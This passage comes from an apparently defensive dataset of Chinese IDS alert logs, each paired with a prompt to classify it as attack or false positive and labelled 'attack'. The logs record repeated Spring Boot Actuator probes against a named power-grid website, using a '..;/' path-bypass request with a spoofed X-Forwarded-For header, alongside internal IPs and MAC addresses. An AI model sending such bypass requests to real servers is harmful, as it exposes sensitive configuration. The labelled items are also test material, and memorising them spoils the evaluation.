"keep-alive", "api": "www.hn.sgcc.com.cn/html/yz/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "first_access_time": "2024-11-27 14:51:10", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--上海市--上海市", "x-forwarded-for": "127.0.0.1", "dnt": "1", "x_forwarded_for": "127.0.0.1", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Spring Boot Actuator endpoints 未授权访问漏洞", "alarm_sip": "172.31.193.55", "skyeye_index": "", "sip_ioc_dip": "6d29109c76173974c2e9ea3eeb73d22b", "xff": "127.0.0.1", "vuln_desc": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "attack_chain": "0x01020000", "vuln_harm": "攻击者可以利用该漏洞在未授权的情况下访问应用程序相关的敏感配置信息。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732690249", "code_language": "", "public_date": "2023-05-18 16:29:09", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "495", "h_proto_version": "HTTP/1.1", "uri": "/html/yz/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10021633", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "111.231.115.230", "host_md5": "82db2e880e0a0d0c3bb07f8c38a03511", "accept-encoding": "gzip, deflate", "user-agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0)", "referer": "https://www.google.com/", "vlan_id": "", "vuln_type": "Spring Boot Actuator endpoints 未授权访问漏洞", "attack_type": "信息泄露", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1、开启认证授权\r\n引入spring-boot-starter-security依赖,在application.properties文件中开启security功能\r\n2、禁用Actuator接口\r\n禁用某个接口,以禁用env接口为例,则可设置如下:\r\nendpoints.env.enabled=false #禁用env接口\r\n禁用所有接口,则可设置如下:\r\nendpoints.enabled=false\r\n3、升级至安全版本。", "hit_start": "475", "skyeye_id": "", "payload": {"req_header": "R0VUIC9odG1sL3l6L29hdXRoL2NvZGUvLi47Ly4uOy9hY3R1YXRvcjsuanMvLi47L2FjdHVhdG9yOy5qcyBIVFRQLzEuMQ0KSG9zdDogd3d3LmhuLnNnY2MuY29tLmNuDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoY29tcGF0aWJsZTsgTVNJRSA5LjA7IFdpbmRvd3MgTlQgNi4wOyBUcmlkZW50LzUuMDsgIFRyaWRlbnQvNS4wKQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LCovKjtxPTAuOA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOSx6aC1DTjtxPTAuOCx6aDtxPTAuNw0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0wDQpETlQ6IDENClJlZmVyZXI6IGh0dHBzOi8vd3d3Lmdvb2dsZS5jb20vDQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxDQpYLUZvcndhcmRlZC1Gb3I6IDEyNy4wLjAuMQ0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.com.cn", "host_state": "失败", "cache-control": "max-age=0", "accept-language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_4bf539a59a191a7671f81f47e1811552", "access_time": "2024-11-27 14:51:10", "attack_addr": "中国--上海市--上海市(31.232382/121.468973)", "type_chain": "16160000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "111.231.115.230", "dimension": "3", "url_path": "/html/yz/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "src_mac": "00:94:a1:5e:6e:87", "file_name": "actuator;.js", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /html/yz/oauth/code/..;/..;/actuator;.js/..;/actuator;.js HTTP/1.1\r\nHost: www.hn.sgcc.com.cn\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0)\r\nAccept-Encoding: gzip, deflate\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nConnection: keep-alive\r\nAccept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7\r\nCache-Control: max-age=0\r\nDNT: 1\r\nReferer: https://www.google.com/\r\nUpgrade-Insecure-Requests: 1\r\nX-Forwarded-For: 127.0.0.1\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268572211-Spring Boot Actuator endpoints 未授权访问漏洞", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/Vista\", \"software\": \"IE/9.0\", \"hw_type\": \"PC\"}}", "sport": "35350", "h_url": "/html/yz/oauth/code/..;/..;/actuator;.js/..;/actuator;.js"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732690270", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "信息泄露", "_origin": {"write_date": 1732690270, "vuln_harm": "攻击者可以利用该漏洞在未授权的情况下访问应用程序相关的敏感配置信息。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.55", "site_app": "", "hit_end": 490, "uri": "/html/cz/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "dport": 80, "vuln_name": "Spring Boot Actuator endpoints 未授权访问漏洞", "rsp_status": 0, "code_language": "", "solution": "1、开启认证授权\r\n引入spring-boot-starter-security依赖,在application.properties文件中开启security功能\r\n2、禁用Actuator接口\r\n禁用某个接口,以禁用env接口为例,则可设置如下:\r\nendpoints.env.enabled=false #禁用env接口\r\n禁用所有接口,则可设置如下:\r\nendpoints.enabled=false\r\n3、升级至安全版本。", "hit_start": 470, "detail_info": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "xff": "127.0.0.1", "sip": "124.220.7.200", "vuln_desc": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "public_date": "2023-05-18 16:29:09", "sport": 49784}, "detail_info": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "file_md5": "9c5b10434f807487d997c6ec9d24ecae", "rule_key": "webids", "connection": "keep-alive", "api": "www.hn.sgcc.com.cn/html/cz/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "first_access_time": "2024-11-27 14:51:10", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国", "x-forwarded-for": "127.0.0.1", "dnt": "1", "x_forwarded_for": "127.0.0.1", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Spring Boot Actuator endpoints 未授权访问漏洞", "alarm_sip": "172.31.193.55", "skyeye_index": "", "sip_ioc_dip": "52ac966c37b01d94af7a58431b509a42", "xff": "127.0.0.1", "vuln_desc": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "attack_chain": "0x01020000", "vuln_harm": "攻击者可以利用该漏洞在未授权的情况下访问应用程序相关的敏感配置信息。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732690249", "code_language": "", "public_date": "2023-05-18 16:29:09", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "490", "h_proto_version": "HTTP/1.1", "uri": "/html/cz/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10021633", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "124.220.7.200", "host_md5": "82db2e880e0a0d0c3bb07f8c38a03511", "accept-encoding": "gzip, deflate", "user-agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/68.0", "referer": "https://www.google.com/", "vlan_id": "", "vuln_type": "Spring Boot Actuator endpoints 未授权访问漏洞", "attack_type": "信息泄露", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1、开启认证授权\r\n引入spring-boot-starter-security依赖,在application.properties文件中开启security功能\r\n2、禁用Actuator接口\r\n禁用某个接口,以禁用env接口为例,则可设置如下:\r\nendpoints.env.enabled=false #禁用env接口\r\n禁用所有接口,则可设置如下:\r\nendpoints.enabled=false\r\n3、升级至安全版本。", "hit_start": "470", "skyeye_id": "", "payload": {"req_header": "R0VUIC9odG1sL2N6L29hdXRoL2NvZGUvLi47Ly4uOy9hY3R1YXRvcjsuanMvLi47L2FjdHVhdG9yOy5qcyBIVFRQLzEuMQ0KSG9zdDogd3d3LmhuLnNnY2MuY29tLmNuDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFdPVzY0OyBydjo1NC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzY4LjANCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSwqLyo7cT0wLjgNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjksemgtQ047cT0wLjgsemg7cT0wLjcNCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MA0KRE5UOiAxDQpSZWZlcmVyOiBodHRwczovL3d3dy5nb29nbGUuY29tLw0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KWC1Gb3J3YXJkZWQtRm9yOiAxMjcuMC4wLjENCg0K", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.com.cn", "host_state": "失败", "cache-control": "max-age=0", "accept-language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_2aaa3d2d1bdd77e4e67651cf231f9fe1", "access_time": "2024-11-27 14:51:10", "attack_addr": "中国(39.902798/116.401159)", "type_chain": "16160000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "124.220.7.200", "dimension": "3", "url_path": "/html/cz/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "src_mac": "00:94:a1:5e:6e:87", "file_name": "actuator;.js", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /html/cz/oauth/code/..;/..;/actuator;.js/..;/actuator;.js HTTP/1.1\r\nHost: www.hn.sgcc.com.cn\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/68.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nConnection: keep-alive\r\nAccept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7\r\nCache-Control: max-age=0\r\nDNT: 1\r\nReferer: https://www.google.com/\r\nUpgrade-Insecure-Requests: 1\r\nX-Forwarded-For: 127.0.0.1\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268572211-Spring Boot Actuator endpoints 未授权访问漏洞", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/7\", \"software\": \"Firefox/68.0\", \"hw_type\": \"PC\"}}", "sport": "49784", "h_url": "/html/cz/oauth/code/..;/..;/actuator;.js/..;/actuator;.js"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732690146", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "信息泄露", "_origin": {"write_date": 1732690146, "vuln_harm": "攻击者可以利用该漏洞在未授权的情况下访问应用程序相关的敏感配置信息。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.55", "site_app": "", "hit_end": 539, "uri": "/html/sy/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "dport": 80, "vuln_name": "Spring Boot Actuator endpoints 未授权访问漏洞", "rsp_status": 0, "code_language": "", "solution": "1、开启认证授权\r\n引入spring-boot-starter-security依赖,在application.properties文件中开启security功能\r\n2、禁用Actuator接口\r\n禁用某个接口,以禁用env接口为例,则可设置如下:\r\nendpoints.env.enabled=false #禁用env接口\r\n禁用所有接口,则可设置如下:\r\nendpoints.enabled=false\r\n3、升级至安全版本。", "hit_start": 519, "detail_info": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "xff": "127.0.0.1", "sip": "101.34.251.108", "vuln_desc": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "public_date": "2023-05-18 16:29:09", "sport": 45406}, "detail_info": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "file_md5": "9c5b10434f807487d997c6ec9d24ecae", "rule_key": "webids", "connection": "keep-alive", "api": "www.hn.sgcc.com.cn/html/sy/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "first_access_time": "2024-11-27 14:49:06", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国", "x-forwarded-for": "127.0.0.1", "dnt": "1", "x_forwarded_for": "127.0.0.1", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Spring Boot Actuator endpoints 未授权访问漏洞", "alarm_sip": "172.31.193.55", "skyeye_index": "", "sip_ioc_dip": "03ea5a9ed3785e7a82e6a8777d846b3e", "xff": "127.0.0.1", "vuln_desc": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "attack_chain": "0x01020000", "vuln_harm": "攻击者可以利用该漏洞在未授权的情况下访问应用程序相关的敏感配置信息。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732690125", "code_language": "", "public_date": "2023-05-18 16:29:09", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "539", "h_proto_version": "HTTP/1.1", "uri": "/html/sy/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10021633", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "101.34.251.108", "host_md5": "82db2e880e0a0d0c3bb07f8c38a03511", "accept-encoding": "gzip, deflate", "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36", "referer": "https://www.google.com/", "vlan_id": "", "vuln_type": "Spring Boot Actuator endpoints 未授权访问漏洞", "attack_type": "信息泄露", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1、开启认证授权\r\n引入spring-boot-starter-security依赖,在application.properties文件中开启security功能\r\n2、禁用Actuator接口\r\n禁用某个接口,以禁用env接口为例,则可设置如下:\r\nendpoints.env.enabled=false #禁用env接口\r\n禁用所有接口,则可设置如下:\r\nendpoints.enabled=false\r\n3、升级至安全版本。", "hit_start": "519", "skyeye_id": "", "payload": {"req_header": "R0VUIC9odG1sL3N5L29hdXRoL2NvZGUvLi47Ly4uOy9hY3R1YXRvcjsuanMvLi47L2FjdHVhdG9yOy5qcyBIVFRQLzEuMQ0KSG9zdDogd3d3LmhuLnNnY2MuY29tLmNuDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTWFjaW50b3NoOyBJbnRlbCBNYWMgT1MgWCAxMF8xM182KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNzYuMC4zODA5LjEwMCBTYWZhcmkvNTM3LjM2DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksKi8qO3E9MC44DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LHpoLUNOO3E9MC44LHpoO3E9MC43DQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTANCkROVDogMQ0KUmVmZXJlcjogaHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8NClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENClgtRm9yd2FyZGVkLUZvcjogMTI3LjAuMC4xDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.com.cn", "host_state": "失败", "cache-control": "max-age=0", "accept-language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_2e36320142fcc3fa863828d3e79066e8", "access_time": "2024-11-27 14:49:06", "attack_addr": "中国(39.902798/116.401159)", "type_chain": "16160000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "101.34.251.108", "dimension": "3", "url_path": "/html/sy/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "src_mac": "00:94:a1:5e:6e:87", "file_name": "actuator;.js", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /html/sy/oauth/code/..;/..;/actuator;.js/..;/actuator;.js HTTP/1.1\r\nHost: www.hn.sgcc.com.cn\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36\r\nAccept-Encoding: gzip, deflate\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nConnection: keep-alive\r\nAccept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7\r\nCache-Control: max-age=0\r\nDNT: 1\r\nReferer: https://www.google.com/\r\nUpgrade-Insecure-Requests: 1\r\nX-Forwarded-For: 127.0.0.1\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268572211-Spring Boot Actuator endpoints 未授权访问漏洞", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"device\": \"Apple/Mac\", \"os\": \"Mac OS X/10.13\", \"software\": \"Chrome/76.0.3809\", \"hw_type\": \"PC\"}}", "sport": "45406", "h_url": "/html/sy/oauth/code/..;/..;/actuator;.js/..;/actuator;.js"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732689416", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "信息泄露", "_origin": {"write_date": 1732689416, "vuln_harm": "攻击者可以利用该漏洞在未授权的情况下访问应用程序相关的敏感配置信息。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.55", "site_app": "", "hit_end": 539, "uri": "/html/yy/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "dport": 80, "vuln_name": "Spring Boot Actuator endpoints 未授权访问漏洞", "rsp_status": 0, "code_language": "", "solution": "1、开启认证授权\r\n引入spring-boot-starter-security依赖,在application.properties文件中开启security功能\r\n2、禁用Actuator接口\r\n禁用某个接口,以禁用env接口为例,则可设置如下:\r\nendpoints.env.enabled=false #禁用env接口\r\n禁用所有接口,则可设置如下:\r\nendpoints.enabled=false\r\n3、升级至安全版本。", "hit_start": 519, "detail_info": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "xff": "127.0.0.1", "sip": "175.178.12.116", "vuln_desc": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "public_date": "2023-05-18 16:29:09", "sport": 48412}, "detail_info": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "file_md5": "9c5b10434f807487d997c6ec9d24ecae", "rule_key": "webids", "connection": "keep-alive", "api": "www.hn.sgcc.com.cn/html/yy/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "first_access_time": "2024-11-27 14:36:56", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国", "x-forwarded-for": "127.0.0.1", "dnt": "1", "x_forwarded_for": "127.0.0.1", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Spring Boot Actuator endpoints 未授权访问漏洞", "alarm_sip": "172.31.193.55", "skyeye_index": "", "sip_ioc_dip": "fd0ed547f0d535d6a90da68d94dbdac4", "xff": "127.0.0.1", "vuln_desc": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring 